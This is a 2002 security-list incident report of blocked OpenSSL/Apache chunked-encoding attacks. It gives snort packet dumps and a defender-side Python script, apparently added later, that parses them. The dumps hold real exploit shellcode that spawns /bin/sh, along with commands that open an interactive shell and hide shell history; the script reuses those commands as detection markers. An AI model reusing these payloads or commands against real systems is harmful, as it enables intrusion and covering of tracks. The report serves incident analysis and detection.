Hi, we have just had 3 servers attacked via OpenSSL using very similar exploits to the slapper worm. There are however differences:

1/ there was no port 80 scan or probes (targets had clearly been selected beforehand)
2/ there were many more iterations of the basic attack (around 30)

None of the systems were compromised.

Here is the snortsnarf summary of the attack on one system:

Earliest: 17:37:20.489882 on 09/17/2002 (times are UTC +1200)
Latest: 17:39:13.367289 on 09/17/2002

3 different signatures are present for 211.224.129.96 as a source
 * 28 instances of OpenSSL worm attack
 * 28 instances of Apache chunked encoding exploit, uname -a
 * 31 instances of Apache chunked encoding exploit, AAAAA padding

snort packet dumps from one iteration:

[**] Apache chunked encoding exploit, AAAAA padding [**]
09/17-05:37:33.740719 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800 len:0x21C
211.224.129.96:51878 -> 130.216.50.18:443 TCP TTL:49 TOS:0x20 ID:12337 IpLen:20 DgmLen:526 DF
***AP*** Seq: 0xB9A41B14  Ack: 0xFC880B34  Win: 0x1DCE  TcpLen: 32
TCP Options (3) => NOP NOP TS: 163261451 45779712
81 D8 02 01 00 80 00 00 00 80 01 4E C4 44 22 F0  ...........N.D".
A2 3B 7B 70 A8 24 1D D2 62 DA 15 96 7A 16 55 33  .;{p.$..b...z.U3
D1 84 55 86 AA 1B 53 B0 E8 25 4B 4F 4A 01 D2 17  ..U...S..%KOJ...
E6 43 31 09 EC 04 74 80 04 14 22 D6 BD E9 BD 8D  .C1...t...".....
2D 91 AC 39 C6 15 32 38 25 BC 15 8A ED CE C1 A9  -..9..28%.......
D7 6B 92 02 E0 6A 28 69 E4 41 1F AB DD 46 46 CB  .k...j(i.A...FF.
A0 74 E8 5B C4 59 DC 9F B6 52 69 C6 A4 16 94 CC  .t.[.Y...Ri.....
13 FF C6 76 4F 3E A0 88 72 1A CE 11 AF 34 4D 45  ...vO>..r....4ME
8D 7E 2E F4 BC 00 EF C6 FB 63 44 5D 0E 0C 2F 34  .~.......cD]../4
2F 0B 48 2C 41 41 41 41 41 41 41 41 41 41 41 41  /.H,AAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 00 00 00 00 00 00 00 00 41 41 41 41  AAAA........AAAA
01 00 00 00 41 41 41 41 41 41 41 41 41 41 41 41  ....AAAAAAAAAAAA
8C D0 69 40 41 41 41 41 00 00 00 00 00 00 00 00  ..i@AAAA........
00 00 00 00 41 41 41 41 41 41 41 41 00 00 00 00  ....AAAAAAAA....
11 00 00 00 F0 37 3D 08 A0 11 1D 08 10 00 00 00  .....7=.........
10 00 00 00 EB 0A 90 90 90 90 90 90 90 90 90 90  ................
31 DB 89 E7 8D 77 10 89 77 04 8D 4F 20 89 4F 08  1....w..w..O .O.
B3 10 89 19 31 C9 B1 FF 89 0F 51 31 C0 B0 66 B3  ....1.....Q1..f.
07 89 F9 CD 80 59 31 DB 39 D8 75 0A 66 B8 CA A6  .....Y1.9.u.f...
66 39 46 02 74 02 E2 E0 89 CB 31 C9 B1 03 31 C0  f9F.t.....1...1.
B0 3F 49 CD 80 41 E2 F6 31 C9 F7 E1 51 5B B0 A4  .?I..A..1...Q[..
CD 80 31 C0 50 68 2F 2F 73 68 68 2F 62 69 6E 89  ..1.Ph//shh/bin.
E3 50 53 89 E1 99 B0 0B CD 80                    .PS.......

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] OpenSSL worm attack [**]
09/17-05:37:35.403562 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800 len:0x6F
211.224.129.96:51878 -> 130.216.50.18:443 TCP TTL:49 TOS:0x20 ID:12340 IpLen:20 DgmLen:97 DF
***AP*** Seq: 0xB9A41D11  Ack: 0xFC880B6D  Win: 0x1DCE  TcpLen: 32
TCP Options (3) => NOP NOP TS: 163261618 45779777
54 45 52 4D 3D 78 74 65 72 6D 3B 20 65 78 70 6F  TERM=xterm; expo
72 74 20 54 45 52 4D 3D 78 74 65 72 6D 3B 20 65  rt TERM=xterm; e
78 65 63 20 62 61 73 68 20 2D 69 0A 0A           xec bash -i..

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] Apache chunked encoding exploit, uname -a [**]
09/17-05:37:35.403639 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800 len:0x64
211.224.129.96:51878 -> 130.216.50.18:443 TCP TTL:49 TOS:0x20 ID:12341 IpLen:20 DgmLen:86 DF
***AP**F Seq: 0xB9A41D3E  Ack: 0xFC880B6D  Win: 0x1DCE  TcpLen: 32
TCP Options (3) => NOP NOP TS: 163261618 45779777
75 6E 73 65 74 20 48 49 53 54 46 49 4C 45 3B 20  unset HISTFILE;
75 6E 61 6D 65 20 2D 61 3B 20 69 64 3B 20 77 3B  uname -a; id; w;
0A 0A                                            ..

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

Looks to me as if someone has repackaged the exploits to use in a more directed fashion.

-- 
Russell Fulton, Computer and Network Security Officer
The University of Auckland, New Zealand
"It aint necessarily so" - Gershwin

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
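The post above leaves the analyst with raw snort hex/ASCII rows to read by eye. The following Python is an added example, not part of Russell Fulton's message or of snort itself: it rebuilds the payload bytes from snort-style dump rows and produces a short defender-side triage (payload length, longest run of 0x41 padding, longest run of 0x90 NOP bytes, and any of the post-exploitation command strings seen in the capture). The sample rows are copied from the dump in the post (a five-row excerpt of the padding packet and the two command packets); the helper names, the COMMAND_MARKERS list and the triage thresholds are this example's own choices.

```python
import re
from typing import Dict, List, Optional

# Snort writes each payload row as up to 16 uppercase two-digit hex bytes
# followed by a 16-character ASCII rendering. Only the hex columns are data.
HEX_BYTE = re.compile(r"^[0-9A-F]{2}$")
BYTES_PER_ROW = 16


def parse_snort_hexdump(dump: str) -> bytes:
    """Rebuild the raw payload from snort hex+ASCII rows.

    Per row, tokens are consumed while they look like a hex byte, stopping at
    the first non-hex token (the start of the ASCII column) or at 16 bytes.
    Caveat: a short final row whose ASCII column happens to begin with a token
    such as "AD" would be misread; snort's fixed-width layout avoids this, but
    text re-wrapped by a mail archive may not, so check the byte count against
    DgmLen - IpLen - TcpLen from the packet header when it matters.
    """
    payload = bytearray()
    for row in dump.strip().splitlines():
        taken = 0
        for token in row.split():
            if taken == BYTES_PER_ROW or not HEX_BYTE.match(token):
                break
            payload.append(int(token, 16))
            taken += 1
    return bytes(payload)


def longest_run(data: bytes, value: int) -> int:
    """Length of the longest run of one byte value (0x41 padding, 0x90 NOPs)."""
    best = current = 0
    for b in data:
        current = current + 1 if b == value else 0
        best = max(best, current)
    return best


# Command fragments that appear in the captured session; an analyst would
# extend this list from their own captures (constructed list for the example).
COMMAND_MARKERS = ("exec bash -i", "unset HISTFILE", "uname -a")


def triage_payload(data: bytes) -> Dict[str, object]:
    """Summarise one reassembled payload for an analyst."""
    is_text = all(32 <= b < 127 or b in (9, 10, 13) for b in data)
    text: Optional[str] = data.decode("ascii") if is_text else None
    found: List[str] = [m for m in COMMAND_MARKERS if text and m in text]
    return {
        "length": len(data),
        "pad_run_0x41": longest_run(data, 0x41),
        "nop_run_0x90": longest_run(data, 0x90),
        "commands": found,
        "text": text,
    }


# Rows copied from the post's dumps (excerpt of the padding packet, then the
# two command packets); the ASCII column is left in place to show parsing.
PADDING_ROWS = """
2F 0B 48 2C 41 41 41 41 41 41 41 41 41 41 41 41  /.H,AAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 00 00 00 00 00 00 00 00 41 41 41 41  AAAA........AAAA
10 00 00 00 EB 0A 90 90 90 90 90 90 90 90 90 90  ................
"""

SHELL_ROWS = """
54 45 52 4D 3D 78 74 65 72 6D 3B 20 65 78 70 6F  TERM=xterm; expo
72 74 20 54 45 52 4D 3D 78 74 65 72 6D 3B 20 65  rt TERM=xterm; e
78 65 63 20 62 61 73 68 20 2D 69 0A 0A           xec bash -i..
"""

RECON_ROWS = """
75 6E 73 65 74 20 48 49 53 54 46 49 4C 45 3B 20  unset HISTFILE;
75 6E 61 6D 65 20 2D 61 3B 20 69 64 3B 20 77 3B  uname -a; id; w;
0A 0A                                            ..
"""

if __name__ == "__main__":
    for name, rows in (("padding", PADDING_ROWS), ("shell", SHELL_ROWS), ("recon", RECON_ROWS)):
        print(name, triage_payload(parse_snort_hexdump(rows)))
```

Run as a script it prints one triage line per packet; the two command packets decode to clean text containing the markers, while the padding excerpt shows a 48-byte run of 0x41 followed by a 10-byte run of 0x90, which is the shape a detection rule for this family keys on. The byte counts from the full dumps can be cross-checked against the headers in the post (DgmLen 97 - 20 - 32 = 45 bytes for the "OpenSSL worm attack" packet, 86 - 52 = 34 for the "uname -a" packet).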
This archive was generated by hypermail 2b30 : Tue Sep 17 2002 - 17:14:40 PDT